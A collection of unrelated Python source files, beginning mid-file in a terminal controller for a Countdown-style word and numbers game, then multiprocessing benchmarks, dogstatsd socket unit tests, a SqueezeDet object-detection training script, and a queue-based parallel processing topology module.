if event.key == pygame.K_q:
sys.exit(0);
elif event.key == pygame.K_f:
title_bar = not(title_bar)
resized = True
event = pygame.event.poll()
else:
# Initialise ncurses
mainwin = curses.initscr();
curses.start_color();
curses.use_default_colors();
# Initialise colour pairs
for fg in range(0, 8):
for bg in range(0, 8):
if bg == 0:
curses.init_pair(bg * 8 + fg, fg, -1);
elif bg != 0 or fg != 0:
curses.init_pair(bg * 8 + fg, fg, bg);
(screen_height, screen_width) = mainwin.getmaxyx();
curses.noecho();
curses.cbreak();
key = curses.ERR;
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
sock.bind((server, port));
sock.listen(1);
gamewin = curses.newwin(12, screen_width, 0, 0);
helpwin = curses.newwin(4, screen_width, 12, 0);
dialogue = curses.newwin(screen_height - 17, screen_width, 17, 0);
dialogue.scrollok(True);
dialogue.idlok(True);
dialogue.keypad(1);
helpwin.addstr(0, 0, " L letters round 1/2 set player score S start clock");
helpwin.addstr(1, 0, " N numbers round B set both scores SPACE stop clock");
helpwin.addstr(2, 0, " C conundrum round D load dictionary T set title/players");
helpwin.addstr(3, 0, " SHIFT-C set conundrum W check word M show word maxes");
helpwin.refresh();
listener_thread = threading.Thread(target=listener_thread_fn, name="Listener Thread", args=(sock,dialogue));
listener_thread.daemon = True;
listener_thread.start();
state = GameState();
try:
state.load(state_file_name);
except:
pass;
view = CursesLiveGameWindow(gamewin);
view.draw(state);
except:
curses.endwin();
raise;
this_con_revealed = True;
prompt = True;
while True:
if prompt:
dialogue.addstr(">>> ");
dialogue.refresh();
prompt = False;
curses.halfdelay(1);
key = dialogue.getch();
curses.cbreak();
try:
start_clock_prompt = False;
if key == curses.ERR:
pass;
else:
prompt = True;
dialogue_write(dialogue, "");
if key == ord('c'):
if this_con_revealed:
set_conundrum(state, view, dialogue);
if conundrum_round(state, view, dialogue) == 0:
this_con_revealed = False;
elif key == ord('C'):
if set_conundrum(state, view, dialogue) == 0:
this_con_revealed = False;
elif key == ord('n'):
if numbers_round(state, view, dialogue) == 0:
start_clock_prompt = True;
elif key == ord('l'):
if letters_round(state, view, dialogue) == 0:
start_clock_prompt = True;
elif key == ord('k'):
answer = dialogue_prompt(dialogue, "Bottom rack? ");
state.bottom_rack = answer;
elif key == ord('s'):
if state.round_type == 'C':
if state.conundrum_top_state == 0:
state.reveal_conundrum_scramble();
dialogue_write(dialogue, "[SPACE] to stop clock, [R] to reveal answer.");
start_clock();
elif key == ord('i'):
if state.round_type == 'C':
state.reveal_conundrum_incorrect();
elif key == ord('r'):
if state.round_type == 'C':
state.reveal_conundrum_answer();
this_con_revealed = True;
elif key == ord('p') or key == ord(' '):
pause_clock();
if state.round_type == 'C':
dialogue_write(dialogue, "[R] to reveal correct answer, [SPACE] to resume/stop clock.");
elif key == ord('o'):
if state.round_type == 'C' and state.conundrum_bottom_state == 2:
state.conundrum_bottom_state = 0;
resume_clock();
elif key == ord('q'):
answer = dialogue_prompt(dialogue, "Are you sure you want to quit [Y/N]? ");
if len(answer) > 0 and answer[0].upper() == 'Y':
break;
elif key == ord('1'):
set_score(state, view, dialogue, 1);
elif key == ord('!'):
state.s1 += 10;
elif key == ord("\""):
state.s2 += 10;
elif key == ord('2'):
set_score(state, view, dialogue, 2);
elif key == ord('b'):
set_score(state, view, dialogue, 3);
elif key == ord('t'):
set_match_info(state, view, dialogue);
elif key == ord('d'):
answer = dialogue_prompt(dialogue, "Dictionary file [" + dict_file_name + "]? ");
if answer == "":
answer = dict_file_name;
try:
dictionary = load_dictionary(answer);
dict_file_name = answer;
dialogue_write(dialogue, str(len(dictionary)) + " words loaded from " + dict_file_name);
except:
dialogue_write(dialogue, "Couldn't load " + answer);
elif key == ord('w'):
if dictionary == []:
dialogue_write(dialogue, "Can't check words as no dictionary loaded.");
else:
answer = dialogue_prompt(dialogue, "Enter word to check: ");
if answer != "":
if answer.upper() in dictionary:
dialogue_write(dialogue, answer + " is VALID.");
else:
dialogue_write(dialogue, answer + " is INVALID.");
elif key == 5: # ^E
answer = dialogue_prompt(dialogue, "Reset game state, forgetting player names, scores and everything [y/N]? ");
if answer != "" and answer[0].upper() == 'Y':
state.set_state(GameState());
dialogue_write(dialogue, "Done.");
elif key == 24: # ^X
state.round_type = '';
state.letters_rack = "";
elif key == ord('m'):
if state.round_type == 'L':
show_letters_maxes(state, view, dialogue);
elif key < 256:
if chr(key) in string.printable:
keystr = chr(key);
elif key <= ord(' '):
keystr = "^" + chr(key + ord('A') - 1);
else:
keystr = "";
dialogue_write(dialogue, "Unknown command " + keystr);
broadcast_state(state);
state.save(state_file_name);
view.draw(state);
dialogue.cursyncup();
dialogue.refresh();
if start_clock_prompt:
answer = dialogue_prompt(dialogue, "Start clock [Y/n]? ");
if answer == "" or answer[0].upper() != 'N':
start_clock();
except curses.error:
key = curses.ERR;
except:
curses.endwin();
raise;
curses.endwin();
sys.exit(0);
|
test.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, multiprocessing, threading, queue, gc
if sys.platform == 'win32':
_timer = time.clock
else:
_timer = time.time
delta = 1
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
for i in range(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through the queue in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
for i in range(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through connection in',elapsed,'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
a = seq[5]
elapsed = _timer()-t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
l.acquire()
l.release()
elapsed = _timer()-t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
for i in range(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
for i in range(iterations):
c.notify()
c.wait()
elapsed = _timer()-t
c.release()
p.join()
print(iterations * 2, 'waits in', elapsed, 'seconds')
print('average number/sec:', iterations * 2 / elapsed)
####
def test():
manager = multiprocessing.Manager()
gc.disable()
print('\n\t######## testing Queue.Queue\n')
test_queuespeed(threading.Thread, queue.Queue(),
threading.Condition())
print('\n\t######## testing multiprocessing.Queue\n')
test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
multiprocessing.Condition())
print('\n\t######## testing Queue managed by server process\n')
test_queuespeed(multiprocessing.Process, manager.Queue(),
manager.Condition())
print('\n\t######## testing multiprocessing.Pipe\n')
test_pipespeed()
print()
print('\n\t######## testing list\n')
test_seqspeed(range(10))
print('\n\t######## testing list managed by server process\n')
test_seqspeed(manager.list(range(10)))
print('\n\t######## testing Array("i", ..., lock=False)\n')
test_seqspeed(multiprocessing.Array('i', range(10), lock=False))
print('\n\t######## testing Array("i", ..., lock=True)\n')
test_seqspeed(multiprocessing.Array('i', range(10), lock=True))
print()
print('\n\t######## testing threading.Lock\n')
test_lockspeed(threading.Lock())
print('\n\t######## testing threading.RLock\n')
test_lockspeed(threading.RLock())
print('\n\t######## testing multiprocessing.Lock\n')
test_lockspeed(multiprocessing.Lock())
print('\n\t######## testing multiprocessing.RLock\n')
test_lockspeed(multiprocessing.RLock())
print('\n\t######## testing lock managed by server process\n')
test_lockspeed(manager.Lock())
print('\n\t######## testing rlock managed by server process\n')
test_lockspeed(manager.RLock())
print()
print('\n\t######## testing threading.Condition\n')
test_conditionspeed(threading.Thread, threading.Condition())
print('\n\t######## testing multiprocessing.Condition\n')
test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
print('\n\t######## testing condition managed by a server process\n')
test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
test_dogstatsd.py
|
# stdlib
from unittest import TestCase
import socket
import threading
import Queue
from collections import defaultdict
# 3p
import mock
# project
from dogstatsd import mapto_v6, get_socket_address
from dogstatsd import Server, init
from utils.net import IPV6_V6ONLY, IPPROTO_IPV6
class TestFunctions(TestCase):
def test_mapto_v6(self):
self.assertIsNone(mapto_v6('foo'))
self.assertIsNone(mapto_v6('192.'))
self.assertEqual(mapto_v6('192.168.1.1'), '::ffff:192.168.1.1')
self.assertEqual(mapto_v6('::1'), '::1')
self.assertEqual(mapto_v6('ff00::'), 'ff00::')
def test_get_socket_address(self):
with mock.patch('dogstatsd.socket.getaddrinfo') as getaddrinfo:
getaddrinfo.return_value = [(2, 2, 17, '', ('192.168.1.1', 80))]
self.assertEqual(get_socket_address('example.com', 80), ('::ffff:192.168.1.1', 80, 0, 0))
getaddrinfo.return_value = [(30, 2, 17, '', ('::1', 80, 0, 0))]
self.assertEqual(get_socket_address('example.com', 80), ('::1', 80, 0, 0))
self.assertIsNone(get_socket_address('foo', 80))
@mock.patch('dogstatsd.get_config')
@mock.patch('dogstatsd.Server')
def test_init(self, s, gc):
gc.return_value = defaultdict(str)
gc.return_value['non_local_traffic'] = True
gc.return_value['use_dogstatsd'] = True
init()
# if non_local_traffic was passed, use IPv4 wildcard
s.assert_called_once()
args, _ = s.call_args
self.assertEqual(args[1], '0.0.0.0')
class TestServer(TestCase):
@mock.patch('dogstatsd.get_socket_address')
def test_init(self, nh):
nh.return_value = 'foo'
s = Server(None, 'localhost', '1234')
nh.assertCalledOnceWith('localhost', 1234)
self.assertEqual(s.sockaddr, 'foo')
self.assertIsNone(s.socket)
@mock.patch('dogstatsd.select')
def test_start(self, select):
select.select.side_effect = [KeyboardInterrupt, SystemExit]
s1 = Server(mock.MagicMock(), '::1', '1234')
s1.start()
self.assertEqual(s1.socket.family, socket.AF_INET6)
s2 = Server(mock.MagicMock(), '127.0.0.1', '2345')
s2.start()
self.assertEqual(s2.socket.family, socket.AF_INET6)
s2 = Server(mock.MagicMock(), 'foo', '80')
s2.start()
self.assertFalse(s2.running)
def _get_socket(self, addr, port):
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, 0)
sock.bind((addr, port))
return sock
def test_connection_v4(self):
# start the server with a v4 mapped address
sock = self._get_socket('::ffff:127.0.0.1', 12345)
results = Queue.Queue()
def listen():
while True:
res = sock.recvfrom(1024)
results.put(res)
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
# send packets with a v4 client
client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_sock.sendto('msg4', ('127.0.0.1', 12345))
msg = results.get(True, 1)
self.assertEqual(msg[0], 'msg4')
# send packets with a v6 client
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
client_sock.sendto('msg6', ('::1', 12345))
self.assertRaises(Queue.Empty, results.get, True, 1)
def test_connection_v6(self):
# start the server with a v6 address
sock = self._get_socket('::1', 12345)
results = Queue.Queue()
def listen():
while True:
res = sock.recvfrom(1024)
results.put(res)
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
# send packets with a v4 client
client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_sock.sendto('msg4', ('127.0.0.1', 12345))
self.assertRaises(Queue.Empty, results.get, True, 1)
# send packets with a v6 client
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
client_sock.sendto('msg6', ('::1', 12345))
msg = results.get(True, 1)
self.assertEqual(msg[0], 'msg6')
|
train.py
|
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from .config import *
from .dataset import pascal_voc, kitti
from .utils.util import sparse_to_dense, bgr_to_rgb, bbox_transform
from .nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
"""VOC challenge year. 2007 or 2012"""
"""Only used for Pascal VOC dataset""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/bichen/logs/squeezeDet/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeDet',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 10,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
def _draw_box(im, box_list, label_list, color=(0,255,0), cdict=None, form='center'):
assert form == 'center' or form == 'diagonal', \
'bounding box format not accepted: {}.'.format(form)
for bbox, label in zip(box_list, label_list):
if form == 'center':
bbox = bbox_transform(bbox)
xmin, ymin, xmax, ymax = [int(b) for b in bbox]
l = label.split(':')[0] # text before "CLASS: (PROB)"
if cdict and l in cdict:
c = cdict[l]
else:
c = color
# draw box
cv2.rectangle(im, (xmin, ymin), (xmax, ymax), c, 1)
# draw label
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(im, label, (xmin, ymax), font, 0.3, c, 1)
def _viz_prediction_result(model, images, bboxes, labels, batch_det_bbox,
batch_det_class, batch_det_prob):
mc = model.mc
for i in range(len(images)):
# draw ground truth
_draw_box(
images[i], bboxes[i],
[mc.CLASS_NAMES[idx] for idx in labels[i]],
(0, 255, 0))
# draw prediction
det_bbox, det_prob, det_class = model.filter_prediction(
batch_det_bbox[i], batch_det_prob[i], batch_det_class[i])
keep_idx = [idx for idx in range(len(det_prob)) \
if det_prob[idx] > mc.PLOT_PROB_THRESH]
det_bbox = [det_bbox[idx] for idx in keep_idx]
det_prob = [det_prob[idx] for idx in keep_idx]
det_class = [det_class[idx] for idx in keep_idx]
_draw_box(
images[i], det_bbox,
[mc.CLASS_NAMES[idx]+': (%.2f)'% prob \
for idx, prob in zip(det_class, det_prob)],
(0, 0, 255))
def train():
"""Train SqueezeDet model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \
or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'vgg16':
mc = kitti_vgg16_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = VGG16ConvDet(mc)
elif FLAGS.net == 'resnet50':
mc = kitti_res50_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = ResNet50ConvDet(mc)
elif FLAGS.net == 'squeezeDet':
mc = kitti_squeezeDet_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeDet(mc)
elif FLAGS.net == 'squeezeDet+':
mc = kitti_squeezeDetPlus_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeDetPlus(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def _load_data(load_to_placeholder=True):
# read batch input
image_per_batch, label_per_batch, box_delta_per_batch, aidx_per_batch, \
bbox_per_batch = imdb.read_batch()
label_indices, bbox_indices, box_delta_values, mask_indices, box_values, \
= [], [], [], [], []
aidx_set = set()
num_discarded_labels = 0
num_labels = 0
for i in range(len(label_per_batch)): # batch_size
for j in range(len(label_per_batch[i])): # number of annotations
num_labels += 1
if (i, aidx_per_batch[i][j]) not in aidx_set:
aidx_set.add((i, aidx_per_batch[i][j]))
label_indices.append(
[i, aidx_per_batch[i][j], label_per_batch[i][j]])
mask_indices.append([i, aidx_per_batch[i][j]])
bbox_indices.extend(
[[i, aidx_per_batch[i][j], k] for k in range(4)])
box_delta_values.extend(box_delta_per_batch[i][j])
box_values.extend(bbox_per_batch[i][j])
else:
num_discarded_labels += 1
if mc.DEBUG_MODE:
print('Warning: Discarded {}/({}) labels that are assigned to the same '
'anchor'.format(num_discarded_labels, num_labels))
if load_to_placeholder:
image_input = model.ph_image_input
input_mask = model.ph_input_mask
box_delta_input = model.ph_box_delta_input
box_input = model.ph_box_input
labels = model.ph_labels
else:
image_input = model.image_input
input_mask = model.input_mask
box_delta_input = model.box_delta_input
box_input = model.box_input
labels = model.labels
feed_dict = {
image_input: image_per_batch,
input_mask: np.reshape(
sparse_to_dense(
mask_indices, [mc.BATCH_SIZE, mc.ANCHORS],
[1.0]*len(mask_indices)),
[mc.BATCH_SIZE, mc.ANCHORS, 1]),
box_delta_input: sparse_to_dense(
bbox_indices, [mc.BATCH_SIZE, mc.ANCHORS, 4],
box_delta_values),
box_input: sparse_to_dense(
bbox_indices, [mc.BATCH_SIZE, mc.ANCHORS, 4],
box_values),
labels: sparse_to_dense(
label_indices,
[mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES],
[1.0]*len(label_indices)),
}
return feed_dict, image_per_batch, label_per_batch, bbox_per_batch
def _enqueue(sess, coord):
try:
while not coord.should_stop():
feed_dict, _, _, _ = _load_data()
sess.run(model.enqueue_op, feed_dict=feed_dict)
if mc.DEBUG_MODE:
print("added to the queue")
if mc.DEBUG_MODE:
print("Finished enqueue")
except (Exception) as e:
coord.request_stop(e)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
saver = tf.train.Saver(tf.global_variables())
summary_op = tf.summary.merge_all()
ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
init = tf.global_variables_initializer()
sess.run(init)
coord = tf.train.Coordinator()
if mc.NUM_THREAD > 0:
enq_threads = []
for _ in range(mc.NUM_THREAD):
enq_thread = threading.Thread(target=_enqueue, args=[sess, coord])
# enq_thread.isDaemon()
enq_thread.start()
enq_threads.append(enq_thread)
threads = tf.train.start_queue_runners(coord=coord, sess=sess)
run_options = tf.RunOptions(timeout_in_ms=60000)
# try:
for step in range(FLAGS.max_steps):
if coord.should_stop():
sess.run(model.FIFOQueue.close(cancel_pending_enqueues=True))
coord.request_stop()
coord.join(threads)
break
start_time = time.time()
if step % FLAGS.summary_step == 0:
feed_dict, image_per_batch, label_per_batch, bbox_per_batch = \
_load_data(load_to_placeholder=False)
op_list = [
model.train_op, model.loss, summary_op, model.det_boxes,
model.det_probs, model.det_class, model.conf_loss,
model.bbox_loss, model.class_loss
]
_, loss_value, summary_str, det_boxes, det_probs, det_class, \
conf_loss, bbox_loss, class_loss = sess.run(
op_list, feed_dict=feed_dict)
_viz_prediction_result(
model, image_per_batch, bbox_per_batch, label_per_batch, det_boxes,
det_class, det_probs)
image_per_batch = bgr_to_rgb(image_per_batch)
viz_summary = sess.run(
model.viz_op, feed_dict={model.image_to_show: image_per_batch})
summary_writer.add_summary(summary_str, step)
summary_writer.add_summary(viz_summary, step)
summary_writer.flush()
print('conf_loss: {}, bbox_loss: {}, class_loss: {}'.
format(conf_loss, bbox_loss, class_loss))
else:
if mc.NUM_THREAD > 0:
_, loss_value, conf_loss, bbox_loss, class_loss = sess.run(
[model.train_op, model.loss, model.conf_loss, model.bbox_loss,
model.class_loss], options=run_options)
else:
feed_dict, _, _, _ = _load_data(load_to_placeholder=False)
_, loss_value, conf_loss, bbox_loss, class_loss = sess.run(
[model.train_op, model.loss, model.conf_loss, model.bbox_loss,
model.class_loss], feed_dict=feed_dict)
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}, conf_loss: {}, bbox_loss: {}, ' \
'class_loss: {}'.format(loss_value, conf_loss, bbox_loss, class_loss)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print(format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or (step + 1) == FLAGS.max_steps:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
# except Exception, e:
# coord.request_stop(e)
# finally:
# coord.request_stop()
# coord.join(threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
parallel.py
|
import logging
import multiprocessing
import threading
from dataclasses import dataclass
from typing import TypeVar, Generic, List, Tuple, Callable
from glimmer.processing import Topology, Operator, Source, Sink, Node, Executable, Environment
Result = TypeVar("Result")
Out = TypeVar("Out")
@dataclass
class ParallelTopology(Topology, Generic[Result, Out]):
__POISON__ = 'POISON'
def __init__(self, sources, operators, sinks):
self.raw_sources = sources
self.raw_operators = operators
self.raw_sinks = sinks
self.sources = []
self.operators = []
self.sinks = []
self.queues = dict()
self._prepare_topology()
def _prepare_topology(self):
sources = []
for source in self.raw_sources:
queues = []
for out in list(source.outputs.keys()):
queue = multiprocessing.Queue()
queues.append(queue)
self.queues[(source.name, out)] = queue
sources.append(SourceWrapper(source, queues))
for operator in self.raw_operators:
queues = []
for out in list(operator.outputs.keys()):
queue = multiprocessing.Queue()
queues.append(queue)
self.queues[(operator.name, out)] = queue
operators = []
for operator in self.raw_operators:
in_queues = []
for node in list(operator.inputs.keys()):
queue = self.queues.get((node, operator.name))
if queue is None:
raise AttributeError(f'Found uninitialized edge: {node}->{operator.name}')
in_queues.append((node, queue))
out_queues = []
for node1, node2 in self.queues:
if node1 == operator.name:
out_queues.append(self.queues[(node1, node2)])
operators.append(OperatorWrapper(operator, in_qs=in_queues, out_qs=out_queues))
sinks = []
for sink in self.raw_sinks:
queues = []
for node in list(sink.inputs.keys()):
queue = self.queues.get((node, sink.name))
if queue is None:
raise AttributeError(f'Found uninitialized edge: {node}->{sink.name}')
queues.append((node, queue))
sinks.append(SinkWrapper(sink, queues))
self.sources = sources
self.operators = operators
self.sinks = sinks
@property
def nodes(self):
all_nodes = self.operators.copy()
all_nodes.extend(self.sources)
all_nodes.extend(self.sinks)
return all_nodes
def stop_topology(self):
for q in self.queues.values():
q.put(ParallelTopology.__POISON__)
def _contains_duplicate_node(nodes: List[Node], check: Node):
for node in nodes:
if node.name == check.name and node is not check:
return True
return False
def _warn_duplicate(nodes: List[Node], logger: logging.Logger):
already_logged = dict()
for node in nodes:
if _contains_duplicate_node(nodes, node) and already_logged.get(node.name) is None:
already_logged[node.name] = True
logger.warning(f'Topology was initialized twice with the same name "{node.name}".'
f'Nodes must have unique names, so check if there are any with the same name.')
def mk_parallel_topology(start: List[Source], logger: logging.Logger = logging.getLogger(__name__)) -> ParallelTopology:
"""
Helper function to generate a topology from a list of initialized sources.
Goes through the topology in a breadth-first manner to look for all nodes used.
"""
sources = start
_warn_duplicate(sources, logger)
operators = dict()
sinks = dict()
def register_node(node):
if isinstance(node, Operator):
operators[node.name] = node
for out in node.outputs.values():
register_node(out)
elif isinstance(node, Sink):
sinks[node.name] = node
elif isinstance(node, Source):
for out in node.outputs.values():
register_node(out)
else:
raise AttributeError('Unknown Node Type encountered')
for source in sources:
register_node(source)
return ParallelTopology(sources, list(operators.values()), list(sinks.values()))
def get_items(in_qs):
items = dict()
for node_name, in_q in in_qs:
item = in_q.get()
if item == ParallelTopology.__POISON__:
items = ParallelTopology.__POISON__
return items
items[node_name] = item
if len(items) == 1:
items = list(items.values())[0]
return items
class OperatorWrapper:
def __init__(self, op: Operator, in_qs: List[Tuple[str, multiprocessing.Queue]],
out_qs: List[multiprocessing.Queue]):
if len(in_qs) == 0:
raise AttributeError(f'Operator does not have any inputs {op.name}')
if len(out_qs) == 0:
raise AttributeError(f'Operator does not have any outputs {op.name}')
self.op = op
self.in_qs = in_qs
self.out_qs = out_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start operator {self.name}')
self.open()
try:
while not stop.is_set():
items = get_items(self.in_qs)
if items == ParallelTopology.__POISON__:
return
self.apply(items, self.publish)
except (KeyboardInterrupt, EOFError):
return
finally:
self.close()
def publish(self, out):
# TODO maybe make None filtering optional via parameter
if out is not None:
for out_q in self.out_qs:
out_q.put(out)
@property
def logger(self):
return self.op.logger
@property
def name(self):
return self.op.name
def open(self):
self.op.open()
def apply(self, data, out):
return self.op.apply(data, out)
def close(self):
if not self.closed:
self.logger.warning(f'Shutting down {self.op.name}')
self.op.close()
self.closed = True
def __str__(self):
return str(self.op)
class SinkWrapper:
def __init__(self, sink: Sink, in_qs: List[Tuple[str, multiprocessing.Queue]]):
if len(in_qs) == 0:
raise AttributeError(f'Sink does not have any inputs {sink.name}')
self.sink = sink
self.in_qs = in_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start sink {self.name}')
self.open()
try:
while not stop.is_set():
items = get_items(self.in_qs)
if items == ParallelTopology.__POISON__:
return
self.write(items)
except (KeyboardInterrupt, EOFError):
pass
finally:
self.close()
return
def open(self):
self.sink.open()
def write(self, data):
self.sink.write(data)
def close(self):
if not self.closed:
self.closed = True
self.logger.warning(f'Shutting down {self.sink.name}')
self.sink.close()
@property
def name(self) -> str:
return self.sink.name
@property
def logger(self) -> logging.Logger:
return self.sink.logger
def __str__(self):
return str(self.sink)
class SourceWrapper:
def __init__(self, source: Source, out_qs: List[multiprocessing.Queue]):
if len(out_qs) == 0:
raise AttributeError(f'Source does not contain any outgoing queues {source.name}')
self.source = source
self.out_qs = out_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start source {self.name}')
try:
while not stop.is_set():
self.read(self.publish)
except (KeyboardInterrupt, EOFError):
pass
finally:
self.close()
def read(self, out):
self.source.read(out)
def close(self):
if not self.closed:
self.closed = True
self.logger.warning(f'Shutting down {self.name}')
self.source.close()
def publish(self, item):
# TODO maybe make None filtering optional via parameter
if item is not None:
for out_q in self.out_qs:
out_q.put(item)
@property
def name(self):
return self.source.name
@property
def logger(self):
return self.source.logger
def __str__(self):
return str(self.source)
class ParallelEnvironment(Environment, Generic[Result, Out]):
"""This environment will execute each node in its own thread. Nodes communicate via multiprocessing.Queue instances
to publish and receive data. This allows to let each node work at its own pace
"""
def __init__(self, topology: ParallelTopology,
task_factory: Callable[[Node, multiprocessing.Event], Executable], logger: logging.Logger = None):
"""
Initializes the environment
:param topology: the topology that will be executed
:param task_factory: factory function that produces from a node and a stop event an executable,
i.e.: multiprocessing.Process or threading.Thread
:param logger
"""
super().__init__(topology, multiprocessing.Event())
if logger is None:
logger = logging.getLogger(__name__)
self.task_factory = task_factory
self.logger = logger
self.p = None
self.nodes = topology.nodes
def start(self, use_thread: bool = False):
if use_thread:
self.p = threading.Thread(target=self.run)
else:
self.p = multiprocessing.Process(target=self.run)
self.p.start()
def join(self, timeout: int = None):
self.p.join(timeout)
def run(self):
processes = []
for node in self.topology.nodes:
processes.append(self.task_factory(node, self.stop_signal))
for p in processes:
p.start()
self.logger.warning('Started topology, watiting for stop signal')
self.stop_signal.wait()
self.topology.stop_topology()
